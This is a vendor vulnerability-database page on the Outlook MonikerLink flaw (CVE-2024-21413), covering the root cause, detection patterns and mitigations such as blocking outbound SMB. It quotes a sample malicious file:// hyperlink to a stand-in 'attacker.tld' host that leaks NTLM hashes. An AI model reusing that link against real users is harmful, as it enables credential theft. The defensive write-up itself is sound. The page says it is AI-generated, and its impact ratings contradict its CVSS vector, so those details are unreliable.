The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2024-21413

CVE-2024-21413: Microsoft Outlook RCE Vulnerability

CVE-2024-21413 is a remote code execution vulnerability in Microsoft Outlook that allows attackers to execute arbitrary code. This article covers the technical details, affected versions, security impact, and mitigation.

Updated: May 15, 2026

CVE-2024-21413 Overview

CVE-2024-21413 is a remote code execution vulnerability in Microsoft Outlook tracked as the MonikerLink bug. The flaw stems from improper input validation [CWE-20] when Outlook parses specially crafted hyperlinks containing the file:// protocol with an exclamation mark. Attackers can bypass Outlook's Protected View and the Office Protected View mode by manipulating moniker links, causing Outlook to load remote payloads through COM. Successful exploitation can leak local NTLM credentials and enable arbitrary code execution in the context of the user. The vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog, and a public proof-of-concept is available.

Critical Impact

Attackers can execute arbitrary code and steal NTLM hashes from Outlook users by sending a crafted email containing a malicious MonikerLink, without requiring user interaction beyond previewing the message.

Affected Products

  • Microsoft 365 Apps for Enterprise
  • Microsoft Office 2016 (x86 and x64)
  • Microsoft Office 2019 (x86 and x64)
  • Microsoft Office Long Term Servicing Channel (LTSC) 2021

Discovery Timeline

  • 2024-02-13 - CVE-2024-21413 published to NVD
  • 2025-10-28 - Last updated in NVD database

Technical Details for CVE-2024-21413

Vulnerability Analysis

The vulnerability resides in how Outlook parses hyperlinks that reference the Component Object Model (COM) moniker subsystem. Crafted file:// URIs containing an exclamation mark cause Outlook to invoke MkParseDisplayName and load the referenced resource through a registered COM handler instead of treating it as an untrusted file path. This bypasses the Protected View sandbox that Microsoft Office normally enforces for content originating from email. The exploitation flow described by Check Point Research triggers SMB authentication to an attacker-controlled host, leaking the Net-NTLMv2 hash of the victim. The same primitive can launch other COM-registered applications such as Microsoft Word in editing mode, expanding the attack surface to additional document-parsing vulnerabilities. The bug is reachable from the Outlook preview pane in some configurations, removing the need for the user to explicitly click the link.

Root Cause

The root cause is improper input validation of the URL parsing routine that handles hyperlinks in Outlook messages. Outlook fails to sanitize the ! character in file:// URIs, allowing the value to be interpreted as a composite moniker by the underlying COM API instead of a path string.

Attack Vector

The attack vector is network-based. An attacker sends an email containing a hyperlink such as <a href="file:///\\attacker.tld\share\file.rtf!something">click</a>. When Outlook processes the message, the embedded moniker forces a remote resource load over SMB or WebDAV, resulting in credential disclosure and potential code execution through chained Office handlers. See the Check Point Analysis on MonikerLink Bug and the public proof-of-concept repository for technical details.

Detection Methods for CVE-2024-21413

Indicators of Compromise

  • Inbound emails containing hyperlinks with file:// URIs that include an exclamation mark followed by additional path data.
  • Outbound SMB (TCP/445) or WebDAV connections originating from OUTLOOK.EXE to untrusted external hosts immediately after email retrieval.
  • Unexpected child processes spawned by OUTLOOK.EXE, including WINWORD.EXE, rundll32.exe, or scripting hosts loading remote content.
  • NTLM authentication events directed at external IP addresses sourced from end-user workstations.

Detection Strategies

  • Inspect mail flow at the gateway for HTML or plain-text hyperlinks containing the pattern file://.*! and quarantine matching messages.
  • Hunt endpoint telemetry for OUTLOOK.EXE invoking MkParseDisplayName followed by network egress to non-corporate destinations.
  • Correlate process-create events where Outlook is the parent of an Office or scripting binary with the loaded command line referencing a UNC path.

Monitoring Recommendations

  • Enable PowerShell and Office telemetry logging through Microsoft Defender for Endpoint or equivalent EDR to capture COM activation events.
  • Forward authentication logs to a SIEM and alert on NTLM challenges from internal workstations to external IP space.
  • Review Outlook crash and Application logs for anomalous moniker-handling errors that may indicate exploitation attempts.

How to Mitigate CVE-2024-21413

Immediate Actions Required

  • Apply the February 2024 Microsoft Patch Tuesday updates for Microsoft 365 Apps, Office 2016, Office 2019, and Office LTSC 2021 immediately.
  • Block outbound SMB (TCP/445) and WebDAV traffic from user workstations to the public internet at the perimeter firewall.
  • Enforce SMB signing and disable NTLM authentication to external destinations to limit credential theft impact.
  • Prioritize remediation given the CISA KEV listing and the publicly available proof-of-concept exploit.

Patch Information

Microsoft released fixes on February 13, 2024. Refer to the Microsoft CVE-2024-21413 Update guidance for the exact build numbers per channel. Administrators can also apply the Vicarius Mitigation Script for CVE-2024-21413 and validate exposure using the Vicarius Detection Script.

Workarounds

  • Configure Group Policy to disable the Outlook preview pane until patches are deployed enterprise-wide.
  • Restrict outbound SMB and WebDAV at the network edge to prevent credential relay and remote payload loading.
  • Use Microsoft Defender Attack Surface Reduction rules to block Office applications from creating child processes.
  • Train users to avoid clicking unsolicited links and report suspicious messages containing file:// URIs to the security team.
bash
# Configuration example: block outbound SMB on Windows endpoints
New-NetFirewallRule -DisplayName "Block Outbound SMB 445" `
  -Direction Outbound -Protocol TCP -RemotePort 445 `
  -Action Block -Profile Any

# Disable NTLM authentication to remote servers via Group Policy
# Computer Configuration > Windows Settings > Security Settings >
# Local Policies > Security Options >
# "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" = Deny all

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeRCE

  • Vendor/TechMicrosoft 365 Apps

  • SeverityCRITICAL

  • CVSS Score9.8

  • EPSS Probability92.96%

  • Known ExploitedYes
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityHigh
  • CISA KEV Information
  • In CISA KEVYes
  • CWE References
  • CWE-20

  • NVD-CWE-noinfo
  • Technical References
  • Check Point Analysis on MonikerLink Bug

  • Vicarius Detection Script for CVE-2024-21413

  • CISA Known Exploited Vulnerabilities for CVE-2024-21413
  • Vendor Resources
  • Microsoft CVE-2024-21413 Update

  • Vicarius Mitigation Script for CVE-2024-21413
  • Related CVEs
  • CVE-2020-16918: Microsoft 365 Apps RCE Vulnerability

  • CVE-2024-38189: Microsoft Project RCE Vulnerability

  • CVE-2025-21354: Microsoft Excel RCE Vulnerability

  • CVE-2025-47167: Microsoft 365 Apps RCE Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English